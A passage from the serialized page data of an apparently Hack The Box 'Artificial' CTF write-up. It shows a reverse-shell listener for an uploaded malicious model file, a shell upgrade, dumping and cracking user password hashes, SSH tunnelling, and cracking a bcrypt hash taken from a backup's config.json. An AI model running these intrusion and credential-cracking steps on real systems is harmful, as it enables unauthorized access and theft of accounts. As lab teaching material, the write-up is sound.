files)\n",{"type":24,"tag":297,"props":1098,"children":1099},{"class":299,"line":647},[1100],{"type":24,"tag":297,"props":1101,"children":1102},{"style":751},[1103],{"type":34,"value":1104},"# artificial : the name of the image to 
run\n",{"type":24,"tag":25,"props":1106,"children":1108},{"src":1107},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F11.jpg",[],{"type":24,"tag":25,"props":1110,"children":1112},{"src":1111},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F12.jpg",[],{"type":24,"tag":30,"props":1114,"children":1115},{},[1116,1118,1124],{"type":34,"value":1117},"Now let's upload this ",{"type":24,"tag":66,"props":1119,"children":1121},{"className":1120},[],[1122],{"type":34,"value":1123},"exploit.h5",{"type":34,"value":1125}," model to the target.",{"type":24,"tag":287,"props":1127,"children":1129},{"code":1128,"language":725,"meta":7,"className":726,"style":7},"nc -nvlp 6666\n",[1130],{"type":24,"tag":66,"props":1131,"children":1132},{"__ignoreMap":7},[1133],{"type":24,"tag":297,"props":1134,"children":1135},{"class":299,"line":300},[1136,1141,1146],{"type":24,"tag":297,"props":1137,"children":1138},{"style":344},[1139],{"type":34,"value":1140},"nc",{"type":24,"tag":297,"props":1142,"children":1143},{"style":783},[1144],{"type":34,"value":1145}," -nvlp",{"type":24,"tag":297,"props":1147,"children":1148},{"style":552},[1149],{"type":34,"value":1150}," 6666\n",{"type":24,"tag":25,"props":1152,"children":1154},{"src":1153},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F13.gif",[],{"type":24,"tag":30,"props":1156,"children":1157},{},[1158],{"type":34,"value":1159},"And we got a shell. 
Let's immediately turn this shell into an interactive shell.",{"type":24,"tag":287,"props":1161,"children":1163},{"code":1162,"language":725,"meta":7,"className":726,"style":7},"python3 -c 'import pty; pty.spawn(\"\u002Fbin\u002Fbash\")'\n\nCtrl-Z\n\n# In Kali\nstty raw -echo ; fg\n",[1164],{"type":24,"tag":66,"props":1165,"children":1166},{"__ignoreMap":7},[1167,1185,1192,1200,1207,1215],{"type":24,"tag":297,"props":1168,"children":1169},{"class":299,"line":300},[1170,1175,1180],{"type":24,"tag":297,"props":1171,"children":1172},{"style":344},[1173],{"type":34,"value":1174},"python3",{"type":24,"tag":297,"props":1176,"children":1177},{"style":783},[1178],{"type":34,"value":1179}," -c",{"type":24,"tag":297,"props":1181,"children":1182},{"style":405},[1183],{"type":34,"value":1184}," 'import pty; pty.spawn(\"\u002Fbin\u002Fbash\")'\n",{"type":24,"tag":297,"props":1186,"children":1187},{"class":299,"line":326},[1188],{"type":24,"tag":297,"props":1189,"children":1190},{"emptyLinePlaceholder":14},[1191],{"type":34,"value":332},{"type":24,"tag":297,"props":1193,"children":1194},{"class":299,"line":335},[1195],{"type":24,"tag":297,"props":1196,"children":1197},{"style":344},[1198],{"type":34,"value":1199},"Ctrl-Z\n",{"type":24,"tag":297,"props":1201,"children":1202},{"class":299,"line":367},[1203],{"type":24,"tag":297,"props":1204,"children":1205},{"emptyLinePlaceholder":14},[1206],{"type":34,"value":332},{"type":24,"tag":297,"props":1208,"children":1209},{"class":299,"line":381},[1210],{"type":24,"tag":297,"props":1211,"children":1212},{"style":751},[1213],{"type":34,"value":1214},"# In Kali\n",{"type":24,"tag":297,"props":1216,"children":1217},{"class":299,"line":416},[1218,1223,1228,1233,1238],{"type":24,"tag":297,"props":1219,"children":1220},{"style":344},[1221],{"type":34,"value":1222},"stty",{"type":24,"tag":297,"props":1224,"children":1225},{"style":405},[1226],{"type":34,"value":1227}," 
raw",{"type":24,"tag":297,"props":1229,"children":1230},{"style":783},[1231],{"type":34,"value":1232}," -echo",{"type":24,"tag":297,"props":1234,"children":1235},{"style":350},[1236],{"type":34,"value":1237}," ;",{"type":24,"tag":297,"props":1239,"children":1240},{"style":1046},[1241],{"type":34,"value":1242}," fg\n",{"type":24,"tag":25,"props":1244,"children":1246},{"src":1245},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F14.jpg",[],{"type":24,"tag":46,"props":1248,"children":1250},{"id":1249},"privilege-escalation",[1251],{"type":34,"value":1252},"Privilege Escalation",{"type":24,"tag":1254,"props":1255,"children":1257},"h3",{"id":1256},"app-gael",[1258],{"type":34,"value":1259},"app ➤ gael",{"type":24,"tag":30,"props":1261,"children":1262},{},[1263,1265,1271],{"type":34,"value":1264},"When we browse our directory, we find a database file in ",{"type":24,"tag":66,"props":1266,"children":1268},{"className":1267},[],[1269],{"type":34,"value":1270},"instance",{"type":34,"value":392},{"type":24,"tag":25,"props":1273,"children":1275},{"src":1274},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F15.jpg",[],{"type":24,"tag":30,"props":1277,"children":1278},{},[1279,1281,1287],{"type":34,"value":1280},"Let's examine this file with ",{"type":24,"tag":66,"props":1282,"children":1284},{"className":1283},[],[1285],{"type":34,"value":1286},"sqlite3",{"type":34,"value":392},{"type":24,"tag":287,"props":1289,"children":1291},{"code":1290},".tables\n\n.headers on\n.mode column\nSELECT * FROM 
user;\n",[1292],{"type":24,"tag":66,"props":1293,"children":1294},{"__ignoreMap":7},[1295],{"type":34,"value":1290},{"type":24,"tag":25,"props":1297,"children":1299},{"src":1298},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F16.jpg",[],{"type":24,"tag":30,"props":1301,"children":1302},{},[1303],{"type":34,"value":1304},"When we check from here, we get the users and their hashed passwords.",{"type":24,"tag":25,"props":1306,"children":1308},{"src":1307},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F17.jpg",[],{"type":24,"tag":30,"props":1310,"children":1311},{},[1312,1314,1320,1322,1329,1331,1337,1339,1345],{"type":34,"value":1313},"When we crack the hash for the ",{"type":24,"tag":66,"props":1315,"children":1317},{"className":1316,"id":86,"style":87},[85],[1318],{"type":34,"value":1319},"gael",{"type":34,"value":1321}," user via ",{"type":24,"tag":37,"props":1323,"children":1326},{"href":1324,"rel":1325},"https:\u002F\u002Fcrackstation.net\u002F",[41],[1327],{"type":34,"value":1328},"crackstation",{"type":34,"value":1330},", we find the password as ",{"type":24,"tag":66,"props":1332,"children":1334},{"className":1333,"id":86,"style":87},[85],[1335],{"type":34,"value":1336},"mattp005numbertwo",{"type":34,"value":1338},". 
Let's try to connect via ",{"type":24,"tag":66,"props":1340,"children":1342},{"className":1341},[],[1343],{"type":34,"value":1344},"ssh",{"type":34,"value":1346}," with this information.",{"type":24,"tag":25,"props":1348,"children":1350},{"src":1349},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F18.jpg",[],{"type":24,"tag":30,"props":1352,"children":1353},{},[1354,1356,1361],{"type":34,"value":1355},"And yes, we are inside the system as ",{"type":24,"tag":66,"props":1357,"children":1359},{"className":1358},[],[1360],{"type":34,"value":1319},{"type":34,"value":392},{"type":24,"tag":1254,"props":1363,"children":1365},{"id":1364},"gael-root",[1366],{"type":34,"value":1367},"gael ➤ root",{"type":24,"tag":30,"props":1369,"children":1370},{},[1371,1373,1380],{"type":34,"value":1372},"Now let's upload ",{"type":24,"tag":37,"props":1374,"children":1377},{"href":1375,"rel":1376},"https:\u002F\u002Fgithub.com\u002Fpeass-ng\u002FPEASS-ng\u002Ftree\u002Fmaster\u002FlinPEAS",[41],[1378],{"type":34,"value":1379},"LinPeas.sh",{"type":34,"value":1381}," to the target to find ways to escalate our privileges.",{"type":24,"tag":25,"props":1383,"children":1385},{"src":1384},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F19.jpg",[],{"type":24,"tag":25,"props":1387,"children":1389},{"src":1388},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F20.jpg",[],{"type":24,"tag":30,"props":1391,"children":1392},{},[1393],{"type":34,"value":1394},"As a result of our investigations, we have caught some important things.",{"type":24,"tag":120,"props":1396,"children":1397},{},[1398,1419],{"type":24,"tag":124,"props":1399,"children":1400},{},[1401,1403,1409,1411,1417],{"type":34,"value":1402},"A software named 
",{"type":24,"tag":66,"props":1404,"children":1406},{"className":1405},[],[1407],{"type":34,"value":1408},"backrest",{"type":34,"value":1410}," in the ",{"type":24,"tag":66,"props":1412,"children":1414},{"className":1413},[],[1415],{"type":34,"value":1416},"\u002Fopt",{"type":34,"value":1418}," folder.",{"type":24,"tag":124,"props":1420,"children":1421},{},[1422,1424],{"type":34,"value":1423},"Two ports that can only be accessed locally.",{"type":24,"tag":25,"props":1425,"children":1427},{"src":1426},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F21.jpg",[],{"type":24,"tag":25,"props":1429,"children":1431},{"src":1430},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F22.jpg",[],{"type":24,"tag":30,"props":1433,"children":1434},{},[1435],{"type":34,"value":1436},"When we examine this backrest software, we understand that it is a backup service. Now let's look at these ports that can only be accessed locally.",{"type":24,"tag":30,"props":1438,"children":1439},{},[1440,1442,1447],{"type":34,"value":1441},"Since we know Gael's user information, we can tunnel with ",{"type":24,"tag":66,"props":1443,"children":1445},{"className":1444},[],[1446],{"type":34,"value":1344},{"type":34,"value":392},{"type":24,"tag":287,"props":1449,"children":1451},{"code":1450,"language":725,"meta":7,"className":726,"style":7},"ssh -L 9898:127.0.0.1:9898 gael@artificial.htb\n# Tunnels port 9898 on the local machine to the address 127.0.0.1:9898 inside the remote (artificial.htb)\n# -L local_port:remote_host:remote_port  -> local 9898 → 127.0.0.1:9898 inside the 
remote\n",[1452],{"type":24,"tag":66,"props":1453,"children":1454},{"__ignoreMap":7},[1455,1477,1485],{"type":24,"tag":297,"props":1456,"children":1457},{"class":299,"line":300},[1458,1462,1467,1472],{"type":24,"tag":297,"props":1459,"children":1460},{"style":344},[1461],{"type":34,"value":1344},{"type":24,"tag":297,"props":1463,"children":1464},{"style":783},[1465],{"type":34,"value":1466}," -L",{"type":24,"tag":297,"props":1468,"children":1469},{"style":405},[1470],{"type":34,"value":1471}," 9898:127.0.0.1:9898",{"type":24,"tag":297,"props":1473,"children":1474},{"style":405},[1475],{"type":34,"value":1476}," gael@artificial.htb\n",{"type":24,"tag":297,"props":1478,"children":1479},{"class":299,"line":326},[1480],{"type":24,"tag":297,"props":1481,"children":1482},{"style":751},[1483],{"type":34,"value":1484},"# Tunnels port 9898 on the local machine to the address 127.0.0.1:9898 inside the remote (artificial.htb)\n",{"type":24,"tag":297,"props":1486,"children":1487},{"class":299,"line":335},[1488],{"type":24,"tag":297,"props":1489,"children":1490},{"style":751},[1491],{"type":34,"value":1492},"# -L local_port:remote_host:remote_port  -> local 9898 → 127.0.0.1:9898 inside the remote\n",{"type":24,"tag":30,"props":1494,"children":1495},{},[1496,1498,1504],{"type":34,"value":1497},"Now let's take a look at this port with ",{"type":24,"tag":66,"props":1499,"children":1501},{"className":1500},[],[1502],{"type":34,"value":1503},"nmap",{"type":34,"value":392},{"type":24,"tag":25,"props":1506,"children":1508},{"src":1507},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F23.jpg",[],{"type":24,"tag":30,"props":1510,"children":1511},{},[1512,1514,1520],{"type":34,"value":1513},"We see that we have an ",{"type":24,"tag":66,"props":1515,"children":1517},{"className":1516},[],[1518],{"type":34,"value":1519},"http",{"type":34,"value":1521}," service, let's check 
it.",{"type":24,"tag":25,"props":1523,"children":1525},{"src":1524},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F24.jpg",[],{"type":24,"tag":30,"props":1527,"children":1528},{},[1529,1531,1537,1539,1545],{"type":34,"value":1530},"And yes, we are faced with the ",{"type":24,"tag":66,"props":1532,"children":1534},{"className":1533},[],[1535],{"type":34,"value":1536},"backrest",{"type":34,"value":1538}," service interface and we see that its version is ",{"type":24,"tag":66,"props":1540,"children":1542},{"className":1541},[],[1543],{"type":34,"value":1544},"1.7.2",{"type":34,"value":1546},". However, when we search for an exploit for this version, we cannot find anything. We need to approach it from a different angle.",{"type":24,"tag":30,"props":1548,"children":1549},{},[1550],{"type":34,"value":1551},"First of all, I tried the credentials we found in the database file here, but unfortunately I was not successful (including admin:12345) 😁.",{"type":24,"tag":30,"props":1553,"children":1554},{},[1555,1557,1563],{"type":34,"value":1556},"So let's do a search with ",{"type":24,"tag":66,"props":1558,"children":1560},{"className":1559},[],[1561],{"type":34,"value":1562},".\u002Flinpeas.sh | grep \"backrest\"",{"type":34,"value":1564}," to see what else it reports about backrest.",{"type":24,"tag":25,"props":1566,"children":1568},{"src":1567},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F25.jpg",[],{"type":24,"tag":30,"props":1570,"children":1571},{},[1572,1574,1580,1581,1587,1589,1595,1597,1603],{"type":34,"value":1573},"In the output, our attention is drawn to the 
",{"type":24,"tag":66,"props":1575,"children":1577},{"className":1576},[],[1578],{"type":34,"value":1579},"\u002Fopt\u002Fbackrest\u002F",{"type":34,"value":73},{"type":24,"tag":66,"props":1582,"children":1584},{"className":1583,"id":86,"style":87},[85],[1585],{"type":34,"value":1586},"\u002Fvar\u002Fbackups\u002Fbackrest_backup.tar.gz",{"type":34,"value":1588}," backup file. When we examine ",{"type":24,"tag":66,"props":1590,"children":1592},{"className":1591},[],[1593],{"type":34,"value":1594},"\u002Fopt\u002Fbackrest",{"type":34,"value":1596},", we see that we do not have permission for it when we try to look at the configurations from the ",{"type":24,"tag":66,"props":1598,"children":1600},{"className":1599},[],[1601],{"type":34,"value":1602},"\u002Fopt\u002Fbackrest\u002F.config\u002Fbackrest",{"type":34,"value":1604}," directory.",{"type":24,"tag":25,"props":1606,"children":1608},{"src":1607},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F26.jpg",[],{"type":24,"tag":30,"props":1610,"children":1611},{},[1612],{"type":34,"value":1613},"We can't get anything from here.",{"type":24,"tag":30,"props":1615,"children":1616},{},[1617,1619,1624,1626,1632,1634,1640,1642,1647,1649,1654],{"type":34,"value":1618},"Now let's check the ",{"type":24,"tag":66,"props":1620,"children":1622},{"className":1621},[],[1623],{"type":34,"value":1586},{"type":34,"value":1625}," backup file. We see that we have read permission for the ",{"type":24,"tag":66,"props":1627,"children":1629},{"className":1628},[],[1630],{"type":34,"value":1631},"sysadm",{"type":34,"value":1633}," group in this file. 
When we check with ",{"type":24,"tag":66,"props":1635,"children":1637},{"className":1636},[],[1638],{"type":34,"value":1639},"id",{"type":34,"value":1641},", the ",{"type":24,"tag":66,"props":1643,"children":1645},{"className":1644},[],[1646],{"type":34,"value":1319},{"type":34,"value":1648}," user is in the ",{"type":24,"tag":66,"props":1650,"children":1652},{"className":1651},[],[1653],{"type":34,"value":1631},{"type":34,"value":1655}," group.",{"type":24,"tag":25,"props":1657,"children":1659},{"src":1658},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F27.jpg",[],{"type":24,"tag":25,"props":1661,"children":1663},{"src":1662},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F28.jpg",[],{"type":24,"tag":30,"props":1665,"children":1666},{},[1667,1669,1675],{"type":34,"value":1668},"So let's download this file to our own device with ",{"type":24,"tag":66,"props":1670,"children":1672},{"className":1671},[],[1673],{"type":34,"value":1674},"scp",{"type":34,"value":1676}," and examine it.",{"type":24,"tag":287,"props":1678,"children":1680},{"code":1679,"language":725,"meta":7,"className":726,"style":7},"scp gael@10.10.11.74:\u002Fvar\u002Fbackups\u002Fbackrest_backup.tar.gz .\ntar -xf backrest_backup.tar.gz\ncd backrest\ncd .config\ncd backrest\nmousepad config.json\n",[1681],{"type":24,"tag":66,"props":1682,"children":1683},{"__ignoreMap":7},[1684,1700,1718,1731,1743,1754],{"type":24,"tag":297,"props":1685,"children":1686},{"class":299,"line":300},[1687,1691,1696],{"type":24,"tag":297,"props":1688,"children":1689},{"style":344},[1690],{"type":34,"value":1674},{"type":24,"tag":297,"props":1692,"children":1693},{"style":405},[1694],{"type":34,"value":1695}," 
gael@10.10.11.74:\u002Fvar\u002Fbackups\u002Fbackrest_backup.tar.gz",{"type":24,"tag":297,"props":1697,"children":1698},{"style":405},[1699],{"type":34,"value":962},{"type":24,"tag":297,"props":1701,"children":1702},{"class":299,"line":326},[1703,1708,1713],{"type":24,"tag":297,"props":1704,"children":1705},{"style":344},[1706],{"type":34,"value":1707},"tar",{"type":24,"tag":297,"props":1709,"children":1710},{"style":783},[1711],{"type":34,"value":1712}," -xf",{"type":24,"tag":297,"props":1714,"children":1715},{"style":405},[1716],{"type":34,"value":1717}," backrest_backup.tar.gz\n",{"type":24,"tag":297,"props":1719,"children":1720},{"class":299,"line":335},[1721,1726],{"type":24,"tag":297,"props":1722,"children":1723},{"style":1046},[1724],{"type":34,"value":1725},"cd",{"type":24,"tag":297,"props":1727,"children":1728},{"style":405},[1729],{"type":34,"value":1730}," backrest\n",{"type":24,"tag":297,"props":1732,"children":1733},{"class":299,"line":367},[1734,1738],{"type":24,"tag":297,"props":1735,"children":1736},{"style":1046},[1737],{"type":34,"value":1725},{"type":24,"tag":297,"props":1739,"children":1740},{"style":405},[1741],{"type":34,"value":1742}," .config\n",{"type":24,"tag":297,"props":1744,"children":1745},{"class":299,"line":381},[1746,1750],{"type":24,"tag":297,"props":1747,"children":1748},{"style":1046},[1749],{"type":34,"value":1725},{"type":24,"tag":297,"props":1751,"children":1752},{"style":405},[1753],{"type":34,"value":1730},{"type":24,"tag":297,"props":1755,"children":1756},{"class":299,"line":416},[1757,1762],{"type":24,"tag":297,"props":1758,"children":1759},{"style":344},[1760],{"type":34,"value":1761},"mousepad",{"type":24,"tag":297,"props":1763,"children":1764},{"style":405},[1765],{"type":34,"value":1766}," 
config.json\n",{"type":24,"tag":25,"props":1768,"children":1770},{"src":1769},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F29.jpg",[],{"type":24,"tag":25,"props":1772,"children":1774},{"src":1773},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F30.jpg",[],{"type":24,"tag":25,"props":1776,"children":1778},{"src":1777},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F31.jpg",[],{"type":24,"tag":30,"props":1780,"children":1781},{},[1782,1784,1790,1792,1798,1799,1805],{"type":34,"value":1783},"And we were able to access ",{"type":24,"tag":66,"props":1785,"children":1787},{"className":1786,"id":86,"style":87},[85],[1788],{"type":34,"value":1789},"config.json",{"type":34,"value":1791}," from this backup file and we see the ",{"type":24,"tag":66,"props":1793,"children":1795},{"className":1794},[],[1796],{"type":34,"value":1797},"name",{"type":34,"value":73},{"type":24,"tag":66,"props":1800,"children":1802},{"className":1801},[],[1803],{"type":34,"value":1804},"password",{"type":34,"value":1806}," parts here.",{"type":24,"tag":287,"props":1808,"children":1812},{"code":1809,"language":1810,"meta":7,"className":1811,"style":7},"{\n  \"modno\": 2,\n  \"version\": 4,\n  \"instance\": \"Artificial\",\n  \"auth\": {\n    \"disabled\": false,\n    \"users\": [\n      {\n        \"name\": \"backrest_root\",\n        \"passwordBcrypt\": \"JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP\",\n      },\n    ],\n  },\n}\n","json","language-json shiki shiki-themes catppuccin-latte 
one-dark-pro",[1813],{"type":24,"tag":66,"props":1814,"children":1815},{"__ignoreMap":7},[1816,1824,1859,1888,1916,1941,1971,1996,2004,2033,2062,2070,2078,2087],{"type":24,"tag":297,"props":1817,"children":1818},{"class":299,"line":300},[1819],{"type":24,"tag":297,"props":1820,"children":1821},{"style":350},[1822],{"type":34,"value":1823},"{\n",{"type":24,"tag":297,"props":1825,"children":1826},{"class":299,"line":326},[1827,1833,1839,1844,1849,1854],{"type":24,"tag":297,"props":1828,"children":1830},{"style":1829},"--shiki-default:#7C7F93;--shiki-dark:#E06C75",[1831],{"type":34,"value":1832},"  \"",{"type":24,"tag":297,"props":1834,"children":1836},{"style":1835},"--shiki-default:#1E66F5;--shiki-dark:#E06C75",[1837],{"type":34,"value":1838},"modno",{"type":24,"tag":297,"props":1840,"children":1841},{"style":1829},[1842],{"type":34,"value":1843},"\"",{"type":24,"tag":297,"props":1845,"children":1846},{"style":350},[1847],{"type":34,"value":1848},":",{"type":24,"tag":297,"props":1850,"children":1851},{"style":552},[1852],{"type":34,"value":1853}," 2",{"type":24,"tag":297,"props":1855,"children":1856},{"style":350},[1857],{"type":34,"value":1858},",\n",{"type":24,"tag":297,"props":1860,"children":1861},{"class":299,"line":335},[1862,1866,1871,1875,1879,1884],{"type":24,"tag":297,"props":1863,"children":1864},{"style":1829},[1865],{"type":34,"value":1832},{"type":24,"tag":297,"props":1867,"children":1868},{"style":1835},[1869],{"type":34,"value":1870},"version",{"type":24,"tag":297,"props":1872,"children":1873},{"style":1829},[1874],{"type":34,"value":1843},{"type":24,"tag":297,"props":1876,"children":1877},{"style":350},[1878],{"type":34,"value":1848},{"type":24,"tag":297,"props":1880,"children":1881},{"style":552},[1882],{"type":34,"value":1883}," 
4",{"type":24,"tag":297,"props":1885,"children":1886},{"style":350},[1887],{"type":34,"value":1858},{"type":24,"tag":297,"props":1889,"children":1890},{"class":299,"line":367},[1891,1895,1899,1903,1907,1912],{"type":24,"tag":297,"props":1892,"children":1893},{"style":1829},[1894],{"type":34,"value":1832},{"type":24,"tag":297,"props":1896,"children":1897},{"style":1835},[1898],{"type":34,"value":1270},{"type":24,"tag":297,"props":1900,"children":1901},{"style":1829},[1902],{"type":34,"value":1843},{"type":24,"tag":297,"props":1904,"children":1905},{"style":350},[1906],{"type":34,"value":1848},{"type":24,"tag":297,"props":1908,"children":1909},{"style":405},[1910],{"type":34,"value":1911}," \"Artificial\"",{"type":24,"tag":297,"props":1913,"children":1914},{"style":350},[1915],{"type":34,"value":1858},{"type":24,"tag":297,"props":1917,"children":1918},{"class":299,"line":381},[1919,1923,1928,1932,1936],{"type":24,"tag":297,"props":1920,"children":1921},{"style":1829},[1922],{"type":34,"value":1832},{"type":24,"tag":297,"props":1924,"children":1925},{"style":1835},[1926],{"type":34,"value":1927},"auth",{"type":24,"tag":297,"props":1929,"children":1930},{"style":1829},[1931],{"type":34,"value":1843},{"type":24,"tag":297,"props":1933,"children":1934},{"style":350},[1935],{"type":34,"value":1848},{"type":24,"tag":297,"props":1937,"children":1938},{"style":350},[1939],{"type":34,"value":1940}," {\n",{"type":24,"tag":297,"props":1942,"children":1943},{"class":299,"line":416},[1944,1949,1954,1958,1962,1967],{"type":24,"tag":297,"props":1945,"children":1946},{"style":1829},[1947],{"type":34,"value":1948},"    
\"",{"type":24,"tag":297,"props":1950,"children":1951},{"style":1835},[1952],{"type":34,"value":1953},"disabled",{"type":24,"tag":297,"props":1955,"children":1956},{"style":1829},[1957],{"type":34,"value":1843},{"type":24,"tag":297,"props":1959,"children":1960},{"style":350},[1961],{"type":34,"value":1848},{"type":24,"tag":297,"props":1963,"children":1964},{"style":552},[1965],{"type":34,"value":1966}," false",{"type":24,"tag":297,"props":1968,"children":1969},{"style":350},[1970],{"type":34,"value":1858},{"type":24,"tag":297,"props":1972,"children":1973},{"class":299,"line":430},[1974,1978,1983,1987,1991],{"type":24,"tag":297,"props":1975,"children":1976},{"style":1829},[1977],{"type":34,"value":1948},{"type":24,"tag":297,"props":1979,"children":1980},{"style":1835},[1981],{"type":34,"value":1982},"users",{"type":24,"tag":297,"props":1984,"children":1985},{"style":1829},[1986],{"type":34,"value":1843},{"type":24,"tag":297,"props":1988,"children":1989},{"style":350},[1990],{"type":34,"value":1848},{"type":24,"tag":297,"props":1992,"children":1993},{"style":350},[1994],{"type":34,"value":1995}," [\n",{"type":24,"tag":297,"props":1997,"children":1998},{"class":299,"line":438},[1999],{"type":24,"tag":297,"props":2000,"children":2001},{"style":350},[2002],{"type":34,"value":2003},"      {\n",{"type":24,"tag":297,"props":2005,"children":2006},{"class":299,"line":481},[2007,2012,2016,2020,2024,2029],{"type":24,"tag":297,"props":2008,"children":2009},{"style":1829},[2010],{"type":34,"value":2011},"        \"",{"type":24,"tag":297,"props":2013,"children":2014},{"style":1835},[2015],{"type":34,"value":1797},{"type":24,"tag":297,"props":2017,"children":2018},{"style":1829},[2019],{"type":34,"value":1843},{"type":24,"tag":297,"props":2021,"children":2022},{"style":350},[2023],{"type":34,"value":1848},{"type":24,"tag":297,"props":2025,"children":2026},{"style":405},[2027],{"type":34,"value":2028}," 
\"backrest_root\"",{"type":24,"tag":297,"props":2030,"children":2031},{"style":350},[2032],{"type":34,"value":1858},{"type":24,"tag":297,"props":2034,"children":2035},{"class":299,"line":563},[2036,2040,2045,2049,2053,2058],{"type":24,"tag":297,"props":2037,"children":2038},{"style":1829},[2039],{"type":34,"value":2011},{"type":24,"tag":297,"props":2041,"children":2042},{"style":1835},[2043],{"type":34,"value":2044},"passwordBcrypt",{"type":24,"tag":297,"props":2046,"children":2047},{"style":1829},[2048],{"type":34,"value":1843},{"type":24,"tag":297,"props":2050,"children":2051},{"style":350},[2052],{"type":34,"value":1848},{"type":24,"tag":297,"props":2054,"children":2055},{"style":405},[2056],{"type":34,"value":2057}," \"JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP\"",{"type":24,"tag":297,"props":2059,"children":2060},{"style":350},[2061],{"type":34,"value":1858},{"type":24,"tag":297,"props":2063,"children":2064},{"class":299,"line":626},[2065],{"type":24,"tag":297,"props":2066,"children":2067},{"style":350},[2068],{"type":34,"value":2069},"      },\n",{"type":24,"tag":297,"props":2071,"children":2072},{"class":299,"line":647},[2073],{"type":24,"tag":297,"props":2074,"children":2075},{"style":350},[2076],{"type":34,"value":2077},"    ],\n",{"type":24,"tag":297,"props":2079,"children":2081},{"class":299,"line":2080},13,[2082],{"type":24,"tag":297,"props":2083,"children":2084},{"style":350},[2085],{"type":34,"value":2086},"  },\n",{"type":24,"tag":297,"props":2088,"children":2090},{"class":299,"line":2089},14,[2091],{"type":24,"tag":297,"props":2092,"children":2093},{"style":350},[2094],{"type":34,"value":2095},"}\n",{"type":24,"tag":30,"props":2097,"children":2098},{},[2099,2101,2108],{"type":34,"value":2100},"Now we understand that this password is hashed, let's check 
",{"type":24,"tag":37,"props":2102,"children":2105},{"href":2103,"rel":2104},"https:\u002F\u002Fhashes.com\u002Fen\u002Ftools\u002Fhash_identifier",[41],[2106],{"type":34,"value":2107},"this site",{"type":34,"value":2109}," to find out what type of hash they use.",{"type":24,"tag":25,"props":2111,"children":2113},{"src":2112},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F32.jpg",[],{"type":24,"tag":25,"props":2115,"children":2117},{"src":2116},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F33.jpg",[],{"type":24,"tag":25,"props":2119,"children":2121},{"src":2120},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F34.jpg",[],{"type":24,"tag":30,"props":2123,"children":2124},{},[2125,2127,2133],{"type":34,"value":2126},"From here we learn that it is hashed with ",{"type":24,"tag":66,"props":2128,"children":2130},{"className":2129},[],[2131],{"type":34,"value":2132},"bcrypt",{"type":34,"value":2134}," and we get the hash. 
The stored passwordBcrypt value is only Base64-encoded, which adds no protection; the decoded bcrypt string is the one used below. Now let's crack it.",{"type":24,"tag":287,"props":2136,"children":2138},{"code":2137,"language":725,"meta":7,"className":726,"style":7},"echo '$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR\u002FACMMkSsspbRutYP58EBZz\u002F0QO' > hash.txt\njohn hash.txt\n",[2139],{"type":24,"tag":66,"props":2140,"children":2141},{"__ignoreMap":7},[2142,2166],{"type":24,"tag":297,"props":2143,"children":2144},{"class":299,"line":300},[2145,2150,2155,2161],{"type":24,"tag":297,"props":2146,"children":2147},{"style":1046},[2148],{"type":34,"value":2149},"echo",{"type":24,"tag":297,"props":2151,"children":2152},{"style":405},[2153],{"type":34,"value":2154}," '$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR\u002FACMMkSsspbRutYP58EBZz\u002F0QO'",{"type":24,"tag":297,"props":2156,"children":2158},{"style":2157},"--shiki-default:#179299;--shiki-dark:#ABB2BF",[2159],{"type":34,"value":2160}," >",{"type":24,"tag":297,"props":2162,"children":2163},{"style":405},[2164],{"type":34,"value":2165}," 